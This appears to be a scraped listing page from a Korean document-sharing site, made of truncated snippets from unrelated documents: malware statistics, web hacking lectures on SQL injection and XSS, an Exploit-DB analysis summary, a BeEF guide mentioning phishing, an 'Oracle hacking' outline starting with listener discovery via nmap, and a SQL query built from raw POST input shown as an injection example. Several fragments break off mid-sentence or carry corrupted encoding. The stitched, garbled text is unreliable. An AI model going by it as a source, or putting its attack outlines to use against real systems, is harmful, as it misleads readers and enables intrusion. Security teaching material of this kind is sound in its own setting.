목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...
More information3장
C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationWEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진
WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More informationEDB 분석보고서 (05.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 3 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting ( 이, XSS) 공격에대한보고가가장많았습니다. 분석된 XSS
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대
第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대검찰청 차장검사,대검찰청 검사,검찰연구관,부
More information1
7차시. 이즐리와 택시도를 활용한 인포그래픽 제작 1. 이즐리 사이트에 대해 알아보고 사용자 메뉴 익히기 01. 이즐리(www.easel.ly) 사이트 접속하기 인포그래픽 제작을 위한 이즐리 사이트는 무료로 제공되는 템플릿을 이용하여 간편하게 인포그래 픽을 만들 수 있는 사이트입니 이즐리는 유료, 무료 구분이 없는 장점이 있으며 다른 인포그래픽 제작 사이트보다
More informationÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù
21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132
More informationPCServerMgmt7
Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
More informationPortal_9iAS.ppt [읽기 전용]
Application Server iplatform Oracle9 A P P L I C A T I O N S E R V E R i Oracle9i Application Server e-business Portal Client Database Server e-business Portals B2C, B2B, B2E, WebsiteX B2Me GUI ID B2C
More information오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이
C Cover Story 05 Simple. Secure. Everywhere. 문서관리 혁신의 출발점, Oracle Documents Cloud Service 최근 문서 관리 시스템의 경우 커다란 비용 투자 없이 효율적으로 문서를 관리하기 위한 기업들의 요구는 지속적으로 증가하고 있다. 이를 위해, 기업 컨텐츠 관리 솔루션 부분을 선도하는 오라클은 문서관리
More informationRUCK2015_Gruter_public
Apache Tajo 와 R 을연동한빅데이터분석 고영경 / 그루터 ykko@gruter.com 목차 : R Tajo Tajo RJDBC Tajo Tajo UDF( ) TajoR Demo Q&A R 과빅데이터분석 ' R 1) R 2) 3) R (bigmemory, snowfall,..) 4) R (NoSQL, MapReduce, Hive / RHIPE, RHive,..)
More informationⅠ. 서론 1989년 CERN의 팀 버너스 리에 의해 만들어진 월드 와이드 웹 기술은 HTML(HyperText Markup Language), URL(Unified Resource Locator, HTTP(Hyper- Text Transfer Protocol)이라는
HTML5 기반의 웹 플랫폼 기술 표준화 동향 d 융합환경하에서의 신성장동력 분석 특집 전종홍 (J.H. Jeon) 이승윤 (S.Y. Lee) 서비스융합표준연구팀 책임연구원 서비스융합표준연구팀 팀장 Ⅰ. 서론 Ⅱ. 웹 기술의 진화 Ⅲ. 웹 애플리케이션 플랫폼 기술 표준 동향 Ⅳ. 웹 운영체제 기술 동향 Ⅴ. 결론 * 본 연구는 방송통신위원회의 지원을 받는 방송통신표준개발지원사업의
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationBEef 사용법.pages
1.... 3 2.... 3 (1)... 3 (2)... 5 3. BeEF... 7 (1) BeEF... 7 (2)... 8 (3) (Google Phishing)... 10 4. ( )... 13 (1)... 14 (2) Social Engineering... 17 (3)... 19 (4)... 21 5.... 22 (1)... 22 (2)... 27 (3)
More informationFileMaker 15 WebDirect 설명서
FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.
More information목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항 11-2 -
대전마케팅공사 경영정보포털 구축 사업 패키지 소프트웨어 2식 구매 설치 시방서 (소프트웨어 2식) 2016. 06. 대전마케팅공사 경 영 지 원 파 트 목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항 11-2 - Ⅰ. 일반사항 1. 목적 본 시방서는 대전마케팅공사가 추진하고 있는 경영정보포털 사업의 패키지 소프트웨어 도입을
More information<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>
웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)
More informationSKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More information슬라이드 1
SW 보안취약점 신고포상제소개 한국인터넷진흥원신대규단장 kshin@kisa.or.kr 차례 I. 버그바운티배경및필요성 II. III. IV. 국외버그바운티운영현황 국내버그바운티운영현황 KISA 버그바운티운영 V. 취약점발굴활성화 / 조치 대응강화 Page 2 I. 버그바운티배경및필요성 - 개요 버그바운티 (Bug Bounty) 란? - 웹서비스또는소프트웨어의취약점을찾아낸사람에게포상금을지급하는제도
More information인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8
차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationPowerPoint Presentation
Windows 10: Changing the Way We Do Windows One Windows Customer Feedback In Product Engagement Windows As A Service Marketing + Engineering Partnership 33,000,000,000,000 페이지 44,000,000,000 사이트
More informationSpecial Theme _ 모바일웹과 스마트폰 본 고에서는 모바일웹에서의 단말 API인 W3C DAP (Device API and Policy) 의 표준 개발 현황에 대해서 살펴보고 관 련하여 개발 중인 사례를 통하여 이해를 돕고자 한다. 2. 웹 애플리케이션과 네이
모바일웹 플랫폼과 Device API 표준 이강찬 TTA 유비쿼터스 웹 응용 실무반(WG6052)의장, ETRI 선임연구원 1. 머리말 현재 소개되어 이용되는 모바일 플랫폼은 아이폰, 윈 도 모바일, 안드로이드, 심비안, 모조, 리모, 팜 WebOS, 바다 등이 있으며, 플랫폼별로 버전을 고려하면 그 수 를 열거하기 힘들 정도로 다양하게 이용되고 있다. 이
More information01 CLICK + 12 13 PLUS + 14 15 Mini Interview WOW! 16 17 02 CLICK + 20 21 PLUS + 22 23 Mini Interview WOW! 24 25 03 CLICK + 28 29 PLUS + 30 31 Mini Interview WOW! 32 33 04 CLICK + 36 37 PLUS + 38 39 Mini
More informationCD-RW_Advanced.PDF
HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper
Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,
More informationAssign an IP Address and Access the Video Stream - Installation Guide
설치 안내서 IP 주소 할당 및 비디오 스트림에 액세스 책임 본 문서는 최대한 주의를 기울여 작성되었습니다. 잘못되거나 누락된 정보가 있는 경우 엑시스 지사로 알려 주시기 바랍니다. Axis Communications AB는 기술적 또는 인쇄상의 오류에 대해 책 임을 지지 않으며 사전 통지 없이 제품 및 설명서를 변경할 수 있습니다. Axis Communications
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More informationPowerPoint 프레젠테이션
Spider For MySQL 실전사용기 피망플러스유닛최윤묵 Spider For MySQL Data Sharding By Spider Storage Engine http://spiderformysql.com/ 성능 8 만 / 분 X 4 대 32 만 / 분 많은 DB 중에왜 spider 를? Source: 클라우드컴퓨팅구 선택의기로 Consistency RDBMS
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More informationRemote UI Guide
Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More informationMicrosoft PowerPoint - Smart CRM v4.0_TM 소개_20160320.pptx
(보험TM) 소개서 2015.12 대표전화 : 070 ) 7405 1700 팩스 : 02 ) 6012 1784 홈 페이지 : http://www.itfact.co.kr 목 차 01. Framework 02. Application 03. 회사 소개 01. Framework 1) Architecture Server Framework Client Framework
More informationMicrosoft PowerPoint - CoolMessenger_제안서_라이트_200508
2005 Aug 0 Table of Contents 1. 제안 개요 P.2 2. 쿨메신저 소개 P.7 3. VoIP 인터넷전화 서비스 P.23 4. 쿨메신저 레퍼런스 사이트 P.32 5. 지란지교소프트 소개 P.37 1 芝 蘭 之 交 2 1. 제안 개요 1) Summery 3 1. 제안 개요 2) 일반 메신저 vs 쿨메신저 보안 문제 기업 정보 & 기밀 유출로
More informationODS-FM1
OPTICAL DISC ARCHIVE FILE MANAGER ODS-FM1 INSTALLATION GUIDE [Korean] 1st Edition (Revised 4) 상표 Microsoft, Windows 및 Internet Explorer는 미국 및 / 또는 다른 국가에서 Microsoft Corporation 의 등록 상표입 Intel 및 Intel Core
More information±èÇö¿í Ãâ·Â
Smartphone Technical Trends and Security Technologies The smartphone market is increasing very rapidly due to the customer needs and industry trends with wireless carriers, device manufacturers, OS venders,
More information취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환
취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer
More information歯sql_tuning2
SQL Tuning (2) SQL SQL SQL Tuning ROW(1) ROW(2) ROW(n) update ROW(2) at time 1 & Uncommitted update ROW(2) at time 2 SQLDBA> @ UTLLOCKT WAITING_SESSION TYPE MODE_REQUESTED MODE_HELD LOCK_ID1
More informationPowerPoint Presentation
WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용
More information5장 SQL 언어 Part II
5 장 SQL 언어 Part II 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 1 / 26 데이터조작문 데이터검색 : SELECT 문데이터추가 : INSERT 문데이터수정 : UPDATE 문데이터삭제 : DELETE 문 박창이 ( 서울시립대학교통계학과 ) 5 장 SQL 언어 Part II 2 / 26 SELECT
More information6강.hwp
----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로
More information*****
Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot
More informationvm-웨어-01장
Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http
More informationI T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r
I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r -------------------------------------------------------------------- -- 1. : ts_cre_bonsa.sql -- 2. :
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More informationCMS-내지(서진이)
2013 CMS Application and Market Perspective 05 11 19 25 29 37 61 69 75 81 06 07 News Feeds Miscellaneous Personal Relationships Social Networks Text, Mobile Web Reviews Multi-Channel Life Newspaper
More information세 입 업 무 편 람 2008.12 경 기 도 교 육 청 ( 재 무 과 ) 목 차 Ⅰ. 세입의 개요 1 1. 세입과 수입의 의의 1 2. 세입의 구성 1 3. 세입의 근거 3 4. 세입의 일반원칙 3 5. 세입의 회계연도 소속 구분 5 Ⅱ. 세입 예산의 구조 및 과목해소 6 1. 교육비특별회계 세입 예산의 구조 및 과목해소 6 2. 학교회계 세입 예산의 구조
More informationFacebook API
Facebook API 2조 20071069 임덕규 20070452 류호건 20071299 최석주 20100167 김민영 목차 Facebook API 설명 Android App 생성 Facebook developers App 등록 Android App Facebook SDK 추가 예제 Error 사항정리 Facebook API Social Plugin Facebook
More informationLU8300_(Rev1.0)_1020.indd
LG-LU8300 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 34 35 36 37 38 39 40 41 42 43 44 45 47 48 49 50 51 52 53 54 55 56 57 58 59 60 62 63 64 65 66
More informationCONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace)
ADOBE PHOTOSHOP LIGHTROOM 글 신동향 사진 신동향, 정한진, 김석준 CONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace) 02
More informationData Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager
Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1
More informationChapter 1
3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More informationOZ-LMS TM OZ-LMS 2008 OZ-LMS 2006 OZ-LMS Lite Best IT Serviece Provider OZNET KOREA Management Philosophy & Vision Introduction OZNETKOREA IT Mission Core Values KH IT ERP Web Solution IT SW 2000 4 3 508-2
More informationPowerPoint 프레젠테이션
SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What
More informationOrcad Capture 9.x
OrCAD Capture Workbook (Ver 10.xx) 0 Capture 1 2 3 Capture for window 4.opj ( OrCAD Project file) Design file Programe link file..dsn (OrCAD Design file) Design file..olb (OrCAD Library file) file..upd
More information특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(
(19) 대한민국특허청(KR) (12) 공개특허공보(A) (11) 공개번호 10-2010-0038259 (43) 공개일자 2010년04월14일 (51) Int. Cl. G01M 15/09 (2006.01) G01M 15/00 (2006.01) (21) 출원번호 10-2008-0097443 (22) 출원일자 2008년10월04일 심사청구일자 전체 청구항 수 :
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More information슬라이드 1
- 감리툴종류 - 1. Linkbot 6.0 2. Allfusion Data Model Validator 3. Orange for Oracle DBA 3.1.4 4. SuperScan 4.0 5. Acunetix Web Vulnerability Scanner 3.0 6. GFI LANguard N.S.S 7.0 7. AppScan 6.5 2008. 04. 04.
More information슬라이드 제목 없음
(Electronic Commerce/Electronic Business) ( ) ,, Bio Bio 1 2 3 Money Money ( ) ( ) 4025 39 21 25 20 13 15 13 15 17 12 11 10 1 23 1 26 ( ) 1 2 2 6 (1 3 ) 1 14:00 20:00 1 2 1 1 5-6 4 e t / Life Cycle (e-commerce)
More informationInside Android Applications
WEBSECURIFY WALKTHROUGH 웹 응용프로그램 침투 테스팅 도구 번역 문서 www.boanproject.com 번역 : 임효영 편집 : 조정원 해당 문서는 연구목적으로 진행된 번역 프로젝트입니다. 상업적으로 사용을 하거나, 악의적인 목적에 의한 사용을 할 시 발생하는 법적인 책임은 사용자 자신에게 있음을 경고합니다. 원본 : http://resources.infosecinstitute.com/websecurify-testing-tool/
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat
Sun Server X3-2( Sun Fire X4170 M3) Oracle Solaris : E35482 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including
More informationContents 3 Info Desk 4 Cover Story 10 New Product A to Z 15 Web Technique 18 Gallery 22 Designer World 27 Customer Spotlight 29 Illustrator Tutorial 3
Speech! Speech! Illustrator Tutorial Customer Spotlight Designer World Gallery Web Technique New Product A to Z Cover Story Info Desk emagazine Contents 3 Info Desk 4 Cover Story 10 New Product A to Z
More information레이아웃 1
소프트웨어취약점분석솔루션 HPE Fortify NOW 보안취약점은 하드웨어, 네트워크, 소프트웨어등모든수준의기업인프라에영향을미칠수있는보안위협의원천이되는프로그램상의약점입니다. 이러한보안취약점은악의적인사용자가보안기능을피해데이터를훔치거나변경하고, 엑세스를거부하고, 중요한비즈니스프로세스를손상시키는수단으로사용됩니다. 1 보안취약점의증가 2012년에보고된새로운보안취약점은총
More informationFreeBSD Handbook
FreeBSD Korea FreeBSD Users Group http://www.kr.freebsd.org/ Security: . 2004 8 7. 1.1 Copyright 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 The FreeBSD Documentation Project.
More information(주)나우프로필의 이동형 대표 개편의 방향이 시민참여를 많이 하는 방향이라, 홈페이지 시안 이 매우 간편해져서 소통이 쉬워질 것 같다. 다만 웹보다 모바일 이용자가 지속적으로 급증하는 추세이므로 이에 적합한 구조가 되도록 보장해야 한다. 소셜미디어전략연구소 배운철 대표
홈페이지 정비 및 향후 추진방향 자문회의 회의록 일 시 : 2012. 1. 16(월) 14:00 ~ 16:00 장 소 : 1동 3층 스마트정보지원센터 참석자 : 내 외부 자문위원(10명), 관련부서 직원(10명), 정보화기획단장, 정보화기획담당관, 관련팀장, 직원 등 정보화기획단에서는 12. 1. 16(월)에 1동 3층 스마트정보지원센터에서 시정 홈페이지 통
More informationCopyright by Korean Local-government Management Institute. ALL RIGHTS RESERVED. No part of this publication may be reproduced, stored in a retrieval s
2014. 5 Copyright by Korean Local-government Management Institute. ALL RIGHTS RESERVED. No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any
More information구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한
수업환경구축 웹데이터베이스구축및실습 구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 http://chrome.google.com 한림대학교웹데이터베이스 - 이윤환 APM 설치 : AUTOSET6
More information±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾
141 2 13 2 13 2 13 9 19 142 2002 MD 143 6 6 6 144 2003 2 6 1) 1 2007 3 p 140 145 6 2) 2002 9 17 18 76 15 58 28 3) 2002 9 17 2 6 2007 4 16 3 2002 9 19 146 10 15 5 TV 5 5 4) 4 2003 p 44 147 2001 2000 2000
More information